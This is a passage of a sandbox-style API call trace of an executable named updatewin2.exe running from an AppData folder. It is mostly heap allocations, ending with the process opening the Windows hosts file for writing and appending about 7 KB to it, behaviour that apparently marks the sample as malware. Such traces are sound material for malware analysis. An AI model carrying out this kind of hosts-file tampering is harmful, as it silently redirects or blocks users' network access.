(HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4fcbe0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4fcc40 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2a) returned 0x4e5420 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4fdbe8 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4fcca0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4fcd00 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4e5458 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x8c) returned 0x4fcd30 [0044.576] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd020 | out: hHeap=0x4d0000) returned 1 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x800) returned 0x4fcdc8 [0044.577] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0044.577] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0044.583] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1423) returned 0x4feaf8 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1423) returned 0x4fff28 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc118 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x18) returned 0x4fd5d0 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc140 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x30) returned 0x4e5490 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd5d0 | out: hHeap=0x4d0000) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc168 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x48) returned 0x4fd5d0 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5490 | out: hHeap=0x4d0000) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc190 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x60) returned 0x4fd620 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd5d0 | out: hHeap=0x4d0000) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x90) returned 0x4fd688 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd620 | out: hHeap=0x4d0000) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc1b8 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xd8) returned 0x4fd720 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd688 | out: hHeap=0x4d0000) returned 1 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc1e0 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc208 [0044.584] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x138) returned 0x4fd5d0 [0044.584] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd720 | out: hHeap=0x4d0000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc230 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc258 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc280 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc2a8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1c8) returned 0x4fd710 [0044.585] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd5d0 | out: hHeap=0x4d0000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc2d0 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc2f8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc320 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc348 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x2a0) returned 0x501358 [0044.585] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd710 | out: hHeap=0x4d0000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc370 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc398 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc3c0 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc3e8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc410 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x4fc438 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501618 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501640 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x3f0) returned 0x4fd5d0 [0044.585] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501358 | out: hHeap=0x4d0000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501668 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501690 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5016b8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5016e0 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501708 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501730 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501758 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501780 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5017a8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x5e8) returned 0x501e00 [0044.585] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fd5d0 | out: hHeap=0x4d0000) returned 1 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5017d0 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5017f8 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501820 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501848 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501870 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501898 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5018c0 [0044.585] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5018e8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501910 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501938 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x8d0) returned 0x5023f0 [0044.586] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501e00 | out: hHeap=0x4d0000) returned 1 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501960 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501988 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5019b0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5019d8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501a00 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501a28 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501a50 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501a78 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501aa0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501ac8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501af0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501b18 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501b40 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501b68 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501b90 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501bb8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xd38) returned 0x502cc8 [0044.586] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5023f0 | out: hHeap=0x4d0000) returned 1 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501be0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501c08 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501c30 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501c58 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501c80 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501ca8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501cd0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501cf8 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501d20 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501d48 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501d70 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501d98 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501dc0 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501e18 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501e40 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501e68 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501e90 [0044.586] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501eb8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501ee0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501f08 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501f30 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501f58 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501f80 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501fa8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501fd0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x501ff8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502020 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502048 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13eb) returned 0x503a08 [0044.587] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502cc8 | out: hHeap=0x4d0000) returned 1 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502070 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502098 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5020c0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5020e8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x30) returned 0x4e5490 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502110 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502138 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502160 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502188 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5021b0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5021d8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502200 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502228 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502250 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502278 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5022a0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5022c8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5022f0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502318 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502340 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502368 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502390 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5023b8 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5023e0 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502408 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502430 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502458 [0044.587] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502480 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5024a8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5024d0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5024f8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502520 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502548 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502570 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502598 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5025c0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502618 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1dc3) returned 0x504e00 [0044.588] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x503a08 | out: hHeap=0x4d0000) returned 1 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502640 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502668 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502690 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5026b8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5026e0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502708 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502730 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502758 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502780 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5027a8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5027d0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5027f8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502820 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502848 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502870 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502898 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5028c0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5028e8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502910 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502938 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502960 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502988 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5029b0 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x5029d8 [0044.588] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502a00 [0044.589] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502a28 [0044.589] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502a50 [0044.589] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502a78 [0044.589] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20) returned 0x502aa0 [0044.589] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fff28 | out: hHeap=0x4d0000) returned 1 [0044.589] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0044.692] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0044.692] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0044.692] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0044.692] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x30) returned 0x4e5500 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x47) returned 0x500110 [0044.692] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5500 | out: hHeap=0x4d0000) returned 1 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6a) returned 0x500160 [0044.692] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500110 | out: hHeap=0x4d0000) returned 1 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9e) returned 0x5001d8 [0044.692] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500160 | out: hHeap=0x4d0000) returned 1 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xec) returned 0x500280 [0044.692] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5001d8 | out: hHeap=0x4d0000) returned 1 [0044.692] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x161) returned 0x500110 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500280 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x211) returned 0x500280 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500110 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x319) returned 0x5004a0 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500280 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x4a5) returned 0x5007c8 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5004a0 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6f7) returned 0x500c78 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5007c8 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xa72) returned 0x500110 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500c78 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xfaa) returned 0x502e00 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x500110 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x17a1) returned 0x506bd0 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502e00 | out: hHeap=0x4d0000) returned 1 [0044.693] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x235f) returned 0x508380 [0044.693] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x506bd0 | out: hHeap=0x4d0000) returned 1 [0044.693] WriteFile (in: hFile=0xa0, lpBuffer=0x5083a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x5083a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0044.694] CloseHandle (hObject=0xa0) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x508380 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc118 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc140 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc168 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc190 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc1b8 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc1e0 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc208 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc230 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc258 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc280 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc2a8 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc2d0 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc2f8 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc320 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc348 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc370 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc398 | out: hHeap=0x4d0000) returned 1 [0044.695] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc3c0 | out: hHeap=0x4d0000) returned 1 [0044.695] 